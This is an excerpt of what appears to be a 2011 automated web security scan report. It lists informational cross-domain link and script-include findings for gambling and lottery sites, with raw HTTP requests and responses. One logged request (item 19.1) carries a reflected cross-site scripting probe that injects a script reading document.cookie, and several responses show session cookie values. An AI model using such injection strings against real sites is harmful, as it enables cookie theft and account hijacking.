Host: www.trustlogo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 16 May 2011 12:31:58 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Vary: Accept-Encoding
Last-Modified: Mon, 16 May 2011 12:31:58 GMT
Expires: Mon, 16 May 2011 12:32:58 GMT
Content-Length: 4164
Vary: Accept-Encoding

<html>
<head>
<title>Site Credentials for http://www.norskelodd.com/</title>
<style type=text/css>
<!--
.p2 { font-family: Arial; font-size: 12px}
.title { font-family: Arial; font-size: 16px}
-->
<
...[SNIP]...
<br>
&nbsp;&nbsp;&nbsp;&nbsp;<a href=http://www.comodogroup.com target="_blank">www.comodogroup.com</a>
...[SNIP]...

18.49. http://www.vincite.net/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.vincite.net
Path:   /

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /?vid=540129 HTTP/1.1
Host: www.vincite.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
ETag: ""
Server: Microsoft-IIS/7.5
X-Powered-By: PHP/5.2.13
Set-Cookie: WinningsSID=v0b5gg3j3lfm7o3fa7sric4bp6; path=/; domain=.vincite.net
Set-Cookie: qtrans_cookie_test=qTranslate+Cookie+Test; path=/; domain=www.vincite.net
Set-Cookie: winnings[subdomain]=it; expires=Wed, 15-Jun-2011 12:02:12 GMT; path=/; domain=.vincite.net
Set-Cookie: winnings[cc]=US; expires=Wed, 15-Jun-2011 12:02:12 GMT; path=/; domain=.vincite.net
Set-Cookie: winnings[lang]=it; expires=Wed, 15-Jun-2011 12:02:12 GMT; path=/; domain=.vincite.net
Set-Cookie: winnings[sessionId]=103122908; path=/; domain=.vincite.net
Set-Cookie: winnings[vid]=540294; expires=Tue, 15-May-2012 12:02:13 GMT; path=/; domain=.vincite.net
X-Pingback: http://winnings.com/xmlrpc.php
Date: Mon, 16 May 2011 12:02:14 GMT
Connection: close
Content-Length: 23217

<!DOCTYPE html>
<html dir="ltr" lang="it-IT">
<head>
<meta charset="UTF-8" />

<title>Winnings.com - La prima destinazione per vincere divertendosi online!..| Winnings.com</title>
<link rel="alternate" type="application/rss+xml" title="..| Winnings.com &raquo; Feed" href="http://it.winnings.com/feed" />
<link rel="alternate" type="application/rss+xml" title="..| Winnings.com &raquo; Feed dei commenti" href="http://it.winnings.com/comments/feed" />
<script type='text/javascript' src='http://winnings.com/wp-includes/js/jquery/jquery.js?ver=1.4.2'></script>
<script type='text/javascript' src='http://winnings.com/wp-content/plugins/google-analyticator/external-tracking.min.js?ver=6.1.1'></script>
<link rel="EditURI" type="application/rsd+xml" title="RSD" href="http://winnings.com/xmlrpc.php?rsd" />
<link rel="wlwmanifest" type="application/wlwmanifest+xml" href="http://winnings.com/wp-includes/wlwmanifest.xml" />
<link rel='index' title='..| Winnings.com' href='http://it.winnings.com' />
<meta name="generator" content="WordPress 3.0" />
<link rel='canonical' href='http://it.winnings.com/' />
<script type="text/javascript" >
...[SNIP]...
</script>

<link rel="profile" href="http://gmpg.org/xfn/11" />
<link rel="stylesheet" type="text/css" media="all" href="http://www.cdnfo.com/css/style-new.css" />
<link rel="pingback" href="http://it.winnings.com/xmlrpc.php" />
<script type="text/javascript" src="http://www.cdnfo.com/scripts/swfobject1-5.js" language="javascript"></script>
<script type="text/javascript" src="http://www.cdnfo.com/scripts/js.js" language="javascript"></script>
...[SNIP]...
<!--header start-->
<link type="image/x-icon" href="http://www.cdnfo.com/images/favicon.ico" rel="icon" /><link type="image/x-icon" href="http://www.cdnfo.com/images/favicon.ico" rel="shortcut icon" />
<center>
...[SNIP]...
<a href="http://www.vincite.net"><img src="http://www.cdnfo.com/images/home/logo.png" border="0" alt="Winnings.com" title="Winnings.com" width="374" height="91" /></a>
...[SNIP]...
<span class="facebook">

           <a href="http://www.facebook.com/WinningsCom?id=tb" target="_blank"><img src="http://www.cdnfo.com/images/follow_us/it/follow-us.png" width="140" height="40" border="0" alt="Seguici su Facebook" title="Seguici su Facebook" /></a>
...[SNIP]...
<li class=" cssMenui"><a class="cssMenui" href="http://www.winnings.com/?vid=540129&amp;&nr=1" onclick="setLangCookie()">English</a></li><li class=" cssMenui"><a class="cssMenui" href="http://fr.winnings.com/?vid=540129">Fran..ais</a></li><li class=" cssMenui"><a class="cssMenui" href="http://es.winnings.com/?vid=540129">Espa..ol</a></li><li class=" cssMenui"><a class="cssMenui" href="http://de.winnings.com/?vid=540129">Deutsch</a></li><li class=" cssMenui"><a class="cssMenui" href="http://it.winnings.com/?vid=540129">Italiano</a></li><li class=" cssMenui"><a class="cssMenui" href="http://nl.winnings.com/?vid=540129">Dutch</a></li><li class=" cssMenui"><a class="cssMenui" href="http://pt.winnings.com/?vid=540129">Portugu..s (PT)</a>
...[SNIP]...
<li class=" cssMenui"><a class="cssMenui" href="http://br.winnings.com/?vid=540129">Português (BR)</a>
...[SNIP]...
<li class=" cssMenui"><a class="cssMenui" href="http://sv.winnings.com/?vid=540129">Svenska</a></li><li class=" cssMenui"><a class="cssMenui" href="http://no.winnings.com/?vid=540129">Norsk</a></li><li class=" cssMenui"><a class="cssMenui" href="http://da.winnings.com/?vid=540129">Dansk</a></li><li class=" cssMenui"><a class="cssMenui" href="http://fi.winnings.com/?vid=540129">Suomea</a></li><li class=" cssMenui"><a class="cssMenui" href="http://el.winnings.com/?vid=540129">Greek</a>
...[SNIP]...
</a> |
<a href="http://it.info.winnings.com/Promotions.aspx" class="topmenu11">Promozioni</a>|
<a href="http://it.info.winnings.com/PlayersClub.aspx" class="topmenu11">Club dei soci</a>|
<a href="http://www.incomate.com/en/WinningsCom.html?sa=winnings.com" class="topmenu11" target="_blank">Affiliati</a>
...[SNIP]...
<div>

<object class="midflash" classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=9,0,0,0" width="770" height="330" id="mid_flash_part" align="left"><param name="wmode" value="transparent" />
...[SNIP]...
<param name="bgcolor" value="#ffffff" /><embed src="http://www.cdnfo.com/images/home/it/eur/mid_flash_part.swf" quality="high" bgcolor="#ffffff" width="770" height="330" name="mid_flash_part" align="left" allowScriptAccess="always" allowFullScreen="false" type="application/x-shockwave-flash" pluginspage="http://www.macromedia.com/go/getflashplayer" wmode="transparent"/><br />
...[SNIP]...
<td width="35" valign="top"><img src="http://www.cdnfo.com/images/slots.png" width="35" height="35" border="0" alt="" style="padding-right:3px;padding-top:16px;vertical-align:top;" /></td>
...[SNIP]...
<td width="35" height="35" valign="top"><img src="http://www.cdnfo.com/images/instant.png" width="35" height="35" border="0" alt="" style="padding-right:3px;padding-top:3px;vertical-align:top;" /></td>
...[SNIP]...
<td width="35" height="35" valign="top"><img src="http://www.cdnfo.com/images/scratch.png" width="35" height="35" border="0" alt="" style="padding-right:3px;vertical-align:top;" /></td>
...[SNIP]...
<td height="130" valign="top" style="padding-left:40px;" rowspan="3" alt="Casinò on-line" title="Casinò on-line">
           <object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=9,0,0,0" width="101" height="118" id="Casino-icon" align="middle">
               <param name="allowScriptAccess" value="always" />
...[SNIP]...
<param name="bgcolor" value="#ffffff" />
               <embed src="http://www.cdnfo.com/images/it/casino_icon.swf" FlashVars="srcURL=http://www.vincite.net/casino&#038;target=_self" quality="high" bgcolor="#ffffff" width="101" height="118" name="Casino-icon" align="middle" allowScriptAccess="always" allowFullScreen="false" type="application/x-shockwave-flash" pluginspage="http://www.macromedia.com/go/getflashplayer" wmode="transparent" /><br />
...[SNIP]...
<td height="130" valign="top" rowspan="3" alt="Poker on-line" title="Poker on-line">
           <object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=9,0,0,0" width="101" height="118" id="Poker-icon" align="middle">
               <param name="allowScriptAccess" value="always" />
...[SNIP]...
<param name="bgcolor" value="#ffffff" />
               <embed src="http://www.cdnfo.com/images/it/poker_icon_lobby.swf" quality="high" bgcolor="#ffffff" width="101" height="118" name="Casino-icon" align="middle" allowScriptAccess="always" allowFullScreen="false" type="application/x-shockwave-flash" pluginspage="http://www.macromedia.com/go/getflashplayer" wmode="transparent" /><br />
...[SNIP]...
<td height="130" valign="top" rowspan="3" alt="Lotterie on-line" title="Lotterie on-line">
           <object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=9,0,0,0" width="101" height="118" id="lottery-icon" align="middle">
               <param name="allowScriptAccess" value="always" />
...[SNIP]...
<param name="bgcolor" value="#ffffff" />
               <embed src="http://www.cdnfo.com/images/it/lottery_icon.swf" quality="high" bgcolor="#ffffff" width="101" height="118" name="Casino-icon" align="middle" allowScriptAccess="always" allowFullScreen="false" type="application/x-shockwave-flash" pluginspage="http://www.macromedia.com/go/getflashplayer" wmode="transparent" /><br />
...[SNIP]...
<td height="130" valign="top" rowspan="3" alt="Bingo on-line" title="Bingo on-line">
           <object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=9,0,0,0" width="101" height="118" id="bingo-icon" align="middle">
               <param name="allowScriptAccess" value="always" />
...[SNIP]...
<param name="bgcolor" value="#ffffff" />
               <embed src="http://www.cdnfo.com/images/it/bingo_icon_lobby.swf" FlashVars="srcURL=http://www.vincite.net/bingo&#038;target=_self" quality="high" bgcolor="#ffffff" width="101" height="118" name="Casino-icon" align="middle" allowScriptAccess="always" allowFullScreen="false" type="application/x-shockwave-flash" pluginspage="http://www.macromedia.com/go/getflashplayer" wmode="transparent" /><br />
...[SNIP]...
<td height="130" valign="top" rowspan="3" alt="Sport on-line" title="Sport on-line">
           <object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=9,0,0,0" width="101" height="118" id="Sports-icon" align="middle">
               <param name="allowScriptAccess" value="always" />
...[SNIP]...
<param name="bgcolor" value="#ffffff" />
               <embed src="http://www.cdnfo.com/images/it/sports_icon_lobby.swf" FlashVars="srcURL=http://www.vincite.net/sports&#038;target=_self" quality="high" bgcolor="#ffffff" width="101" height="118" name="Casino-icon" align="middle" allowScriptAccess="always" allowFullScreen="false" type="application/x-shockwave-flash" pluginspage="http://www.macromedia.com/go/getflashplayer" wmode="transparent" /><br />
...[SNIP]...
<td colspan="4"><a href="http://it.info.winnings.com/ContactUsMail.aspx"><CENTER><img src="http://www.cdnfo.com/images/it/contact-us-text.jpg" width="137" height="17" border="0" style="padding-top:10px;padding-bottom:4px;"/></CENTER>
...[SNIP]...
<td><a href="http://it.info.winnings.com/ContactUsTel.aspx"><IMG SRC="http://www.cdnfo.com/images/phone.png" WIDTH="37" HEIGHT="36" BORDER="0" ALT=""></a></td>
                   <td><a href="http://it.info.winnings.com/ContactUsMail.aspx"><IMG SRC="http://www.cdnfo.com/images/email.png" WIDTH="45" HEIGHT="36" BORDER="0" ALT=""></a></td>
                   <td><a href="http://it.info.winnings.com/ContactUsChat.aspx"><IMG SRC="http://www.cdnfo.com/images/chat.png" WIDTH="42" HEIGHT="36" BORDER="0" ALT=""></a></td>
                   <td><a href="http://www.facebook.com/winningscom" target="_blank"><IMG SRC="http://www.cdnfo.com/images/facebook.png" WIDTH="39" HEIGHT="36" BORDER="0" ALT=""></a>
...[SNIP]...
<center>
<a href="http://it.info.winnings.com/AboutUs.aspx" class="bottommenu">Chi siamo</a> |
<a href="http://it.info.winnings.com/terms.aspx" class="bottommenu">Termini d&#8217;uso</a> |
<a href="http://it.info.winnings.com/securityandprivacy.aspx" class="bottommenu">Sicurezza e Privacy</a> |
<a href="http://it.info.winnings.com/fairPlay.aspx" class="bottommenu">Fair play</a> |
<a href="http://it.info.winnings.com/responsible.aspx" class="bottommenu">Gioco responsabile</a> |
<a href="http://it.info.winnings.com/InviteFriend.aspx" class="bottommenu">Invita un amico</a>
...[SNIP]...
<center>
<a href="http://it.info.winnings.com/contactusmail.aspx" class="bottommenu"> Contatti</a> |
<a href="http://it.info.winnings.com/Help.aspx" class="bottommenu">Aiuto</a>
...[SNIP]...
<MAP NAME="footerMap">
<area shape="rect" coords="30,75,85,115" href="http://it.info.winnings.com/underage.aspx" alt="Gioco Responsabile Online" title="Gioco Responsabile Online" rel="nofollow" />
<area shape="rect" coords="85,75,190,115" href="https://seal.verisign.com/splash?form_file=fdf/splash.fdf&#038;dn=secure.neogames-tech.com&#038;lang=en" alt="Biglietti Gratta e Vinci Sicuri e Garantiti" title="Biglietti Gratta e Vinci Sicuri e Garantiti" target="_blank" rel="nofollow" />
<area shape="rect" coords="195,75,300,115" href="http://download.neogames-tech.com/Website_Scratch2Cash/WebSite/Images/RNG_certificate_080108.pdf" alt="iTech Labs" title="iTech Labs" target="_blank" rel="nofollow" />
<area shape="rect" coords="315,75,475,115" href="http://www.neogames.com/" alt="NeoGames.com" title="NeoGames.com" target="_blank" rel="nofollow" />
<area shape="rect" coords="490,75,580,115" href="http://www.gamblersanonymous.org/" alt="Giocatori d'Azzardo Anonimi" title="Giocatori d'Azzardo Anonimi" target="_blank" rel="nofollow" />
<area shape="rect" coords="585,75,730,115" href="http://download.neogames-tech.com/Website_Scratch2Cash/WebSite/Images/Lotteries&#038;GamingAuthority.pdf" alt="Autorità di Malta per le Lotterie e i Giochi" title="Autorità di Malta per le Lotterie e i Giochi" target="_blank" rel="nofollow" />
</MAP>
<img alt="" border="0" src="http://www.cdnfo.com/images/paymentsbar.gif" USEMAP="#footerMap" />
</div>
...[SNIP]...
bro dell&#8217;EU dal maggio 2007). La sede legale della Società è in 135, High street, Sliema SLM 1549, Malta. La Società gestisce Winnings.com secondo un&#8217;autorizzazione emessa e regolata da <a href="http://download.neogames-tech.com/Website_Scratch2Cash/WebSite/Images/Lotteries&#038;GamingAuthority.pdf" target="_blank" rel="nofollow">Lotteries and Gaming Authority</a>
...[SNIP]...

19. Cross-domain script include
There are 178 instances of this issue:

Issue background

When an application includes a script from an external domain, this script is executed by the browser within the security context of the invoking application. The script can therefore do anything that the application's own scripts can do, such as accessing application data and performing actions within the context of the current user.

If you include a script from an external domain, then you are trusting that domain with the data and functionality of your application, and you are trusting the domain's own security to prevent an attacker from modifying the script to perform malicious actions within your application.

Issue remediation

Scripts should not be included from untrusted domains. If you have a requirement that a third-party script appears to fulfil, then you should ideally copy the contents of that script onto your own domain and include it from there. If that is not possible (e.g. for licensing reasons), then you should consider reimplementing the script's functionality within your own code.


19.1. http://ad.doubleclick.net/N6707/adi/meta.homepage/adminMsg

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /N6707/adi/meta.homepage/adminMsg

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /N6707/adi/meta.homepage/adminMsg;pos=footer;sz=728x90;atf=no;name=leaderboardfooter;pageURL=www.metacafe.com%2Ffplayer%2F%3F4702d%22%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3Ebe96a23f3a3%3D1;studio=null;section=null;category=null;channel=null;rating=clean;hd=no;env=prod;branding=null;fbconnected=false;ffilter=true;referrer=null;LEID=40;tile=9;ord=7083343476988375 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.metacafe.com/fplayer/?4702d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ebe96a23f3a3=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3||t=1305367759|et=730|cs=b-celz5j

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Mon, 16 May 2011 12:49:45 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block
Content-Length: 4978

<html><head><style><!--
a:link { color: #000000 }a:visited { color: #000000 }a:hover { color: #000000 }a:active { color: #000000 } --></style><script><!--
(function(){window.ss=function(a){window.sta
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/js/graphics.js"></script><script src="http://pagead2.googlesyndication.com/pagead/js/abg.js"></script>
...[SNIP]...

19.2. http://ad.doubleclick.net/adi/N6296.276969.AUDIENCESCIENCE/B5384441.427

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N6296.276969.AUDIENCESCIENCE/B5384441.427

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /adi/N6296.276969.AUDIENCESCIENCE/B5384441.427;sz=728x90;click=http://ad.yieldmanager.com/clk?2,13%3B6d73f27533380ecb%3B12ff8dd2e5c,0%3B%3B%3B2381065140,sIBdAMn-GQB7MIsAAAAAAF0gIwAAAAAAAgAAAAYAAAAAAP8AAAACCJ2IKQAAAAAAdxQaAAAAAAClDC4AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADP8BAAAAAAAAIAAwAAAAAAFS7d-C8BAAAAAAAAADUzNTk2ZWY0LTdmYmItMTFlMC1iMGUwLTlmMzlhM2ZiOTE3NgAdjgEAAAA=,,http%3A%2F%2Fd.tradex.openx.com%2Fafr.php%3Fzoneid%3D4408%26cb%3Dinsert_random_number_here,;ord=1305550335? HTTP/1.1
Host: ad.doubleclick.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://d.tradex.openx.com/afr.php?zoneid=4408&cb=INSERT_RANDOM_NUMBER_HERE
Cookie: id=c60bd0733000097|2258832/785797/15105|t=1297260501|et=730|cs=g_qf15ye

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 8277
Cache-Control: no-cache
Pragma: no-cache
Date: Mon, 16 May 2011 12:52:21 GMT
Expires: Mon, 16 May 2011 12:52:21 GMT
Discarded: true

<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->

<!-- Code auto-generated on Mon Apr 11 15:07:45 EDT 2011 -->

<script src="http://s0.2mdn.net/879366/flashwrite_1_2.js"></script>
...[SNIP]...
</noscript>

<script type='text/javascript' language='javascript' src='http://cdn.doubleverify.com/script145.js?agnc=741233&cmp=5384441&crt=&crtname=&adnet=&dvtagver=3.3.1346.2176&adsrv=1&plc=62171182&advid=2993653&sid=1037707&adid='></script>
...[SNIP]...

19.3. https://bingo.betsson.com/en/

Summary

Severity:   Information
Confidence:   Certain
Host:   https://bingo.betsson.com
Path:   /en/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /en/ HTTP/1.1
Host: bingo.betsson.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
Set-Cookie: language=en; expires=Wed, 16-May-2012 11:58:51 GMT; path=/
Set-Cookie: site=en; domain=.betsson.com; expires=Wed, 16-May-2012 11:58:51 GMT; path=/
Set-Cookie: ASP.NET_SessionId=bjkl3qyxamknq4451yotmo55; path=/; HttpOnly
X-AspNet-Version: 2.0.50727
Set-Cookie: language=en; expires=Wed, 16-May-2012 11:58:51 GMT; path=/
Set-Cookie: site=en; domain=.betsson.com; expires=Wed, 16-May-2012 11:58:51 GMT; path=/
Set-Cookie: ASP.NET_SessionId=bjkl3qyxamknq4451yotmo55; path=/; HttpOnly
Set-Cookie: currentSite=1; path=/
Set-Cookie: lggdnstt=0; path=/
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 11:58:51 GMT
Connection: close
Content-Length: 63913


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head">

...[SNIP]...
</script>

<script type="text/javascript" src="https://ble.hs.llnwd.net/e1/betsson/en/df_CoreJsRoot_v105046.js"></script>
...[SNIP]...
<link media="all" href="https://ble.hs.llnwd.net/e1/betsson/en/df_Ctrl_DynFile_CoreCSS_v19613.css" type="text/css" rel="StyleSheet" />
<script type="text/javascript" src="https://ble.hs.llnwd.net/e1/bingo/en/df_BingoMasterJS_v933.js"></script>
...[SNIP]...
</ul>
<script type="text/javascript" src="https://ble.hs.llnwd.net/e1/betsson/en/df_CoreFontLibrary_en_v27087.Js"></script>
...[SNIP]...
</div>
<script type="text/javascript" src="https://ble.hs.llnwd.net/e1/betsson/en/df_CoreJavaScriptV2_v102197.js"></script>
...[SNIP]...

19.4. http://blog.postcodelottery.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blog.postcodelottery.com
Path:   /

Issue detail

The response dynamically includes the following script from another domain:

Request

GET / HTTP/1.1
Host: blog.postcodelottery.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:32:15 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
X-Pingback: http://blog.postcodelottery.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 18767

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">
<head>
<met
...[SNIP]...
</script>
<script type='text/javascript' src='http://ajax.googleapis.com/ajax/libs/jquery/1.3.2/jquery.min.js?ver=1.3.2'></script>
...[SNIP]...

19.5. http://br.bigmoneyscratch.com/Home.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://br.bigmoneyscratch.com
Path:   /Home.aspx

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /Home.aspx HTTP/1.1
Host: br.bigmoneyscratch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:10:00 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=3hrlta45ydrtdn55kcs1yk45; path=/; HttpOnly
Set-Cookie: LanguageCode=BRA; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:10:00 GMT; path=/
Set-Cookie: CSI_12=EncryptedUniqueVisitorID=C16CF2284F72CAB44BCB7639FE94FB79&AffiliateID=12&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; domain=bigmoneyscratch.com; expires=Fri, 16-May-2031 12:10:00 GMT; path=/
Set-Cookie: RegistrationMode=PM; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:10:00 GMT; path=/
Set-Cookie: BO=FM; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:10:00 GMT; path=/
Set-Cookie: UniqueVisitorID=C16CF2284F72CAB44BCB7639FE94FB79; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:10:00 GMT; path=/
Set-Cookie: LanguageCode=BRA; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:10:00 GMT; path=/
Set-Cookie: CountryCode=US; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:10:00 GMT; path=/
Set-Cookie: CSITemp=12; domain=bigmoneyscratch.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 48302


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...
<div id="ctl00_pnlUniqueVisit_12">
   
<script src="http://ad.yieldmanager.com/pixel?id=706968&t=1" type="text/javascript"></script>
...[SNIP]...

19.6. http://br.winnings.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://br.winnings.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET / HTTP/1.1
Host: br.winnings.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
ETag: ""
Server: Microsoft-IIS/7.5
X-Powered-By: PHP/5.2.13
Set-Cookie: WinningsSID=b8ce8h87e1pqll04kbcnv4sh36; path=/; domain=.winnings.com
Set-Cookie: qtrans_cookie_test=qTranslate+Cookie+Test; path=/; domain=winnings.com
Set-Cookie: winnings[subdomain]=br; expires=Wed, 15-Jun-2011 12:45:26 GMT; path=/; domain=.winnings.com
Set-Cookie: winnings[cc]=US; expires=Wed, 15-Jun-2011 12:45:26 GMT; path=/; domain=.winnings.com
Set-Cookie: winnings[lang]=br; expires=Wed, 15-Jun-2011 12:45:26 GMT; path=/; domain=.winnings.com
Set-Cookie: winnings[sessionId]=103123651; path=/; domain=.winnings.com
Set-Cookie: winnings[vid]=541024; expires=Tue, 15-May-2012 12:45:27 GMT; path=/; domain=.winnings.com
X-Pingback: http://winnings.com/xmlrpc.php
Date: Mon, 16 May 2011 12:45:29 GMT
Connection: close
Content-Length: 23207

<!DOCTYPE html>
<html dir="ltr" lang="pt-BR">
<head>
<meta charset="UTF-8" />

<title>Winnings.com - O melhor lugar para jogos de dinheiro online!..| Winnings.com</title>
<link rel="alternate"
...[SNIP]...
<link rel="pingback" href="http://br.winnings.com/xmlrpc.php" />
<script type="text/javascript" src="http://www.cdnfo.com/scripts/swfobject1-5.js" language="javascript"></script>
<script type="text/javascript" src="http://www.cdnfo.com/scripts/js.js" language="javascript"></script>
...[SNIP]...

19.7. http://casino.bet365.com/home/en/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://casino.bet365.com
Path:   /home/en/

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /home/en/ HTTP/1.1
Host: casino.bet365.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:32:23 GMT
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=5xuac3551kzj4cm3dpese255; path=/; HttpOnly
Set-Cookie: bet365_Session=; path=/
Set-Cookie: stk=840278C39B9946C182A492B2D9FF91B8000002; path=/
Set-Cookie: session=stk=840278C39B9946C182A492B2D9FF91B8000002; path=/
Set-Cookie: lng=en-GB; expires=Tue, 15-May-2012 12:32:22 GMT; path=/
Set-Cookie: country=198; expires=Tue, 15-May-2012 12:32:22 GMT; path=/
Set-Cookie: LandingVisited=True; path=/
Cache-Control: private
Expires: Sat, 14 May 2011 12:32:23 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 227712


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >
<head id="ctl00_Head1"><t
...[SNIP]...
</script><script language="javascript" src="http://download.c365download.com/fimversion.conf.php" type="text/javascript"></script>
...[SNIP]...

19.8. https://casino.betsson.com/en/

Summary

Severity:   Information
Confidence:   Certain
Host:   https://casino.betsson.com
Path:   /en/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /en/ HTTP/1.1
Host: casino.betsson.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: language=en; expires=Wed, 16-May-2012 12:14:14 GMT; path=/
Set-Cookie: site=en; domain=.betsson.com; expires=Wed, 16-May-2012 12:14:14 GMT; path=/
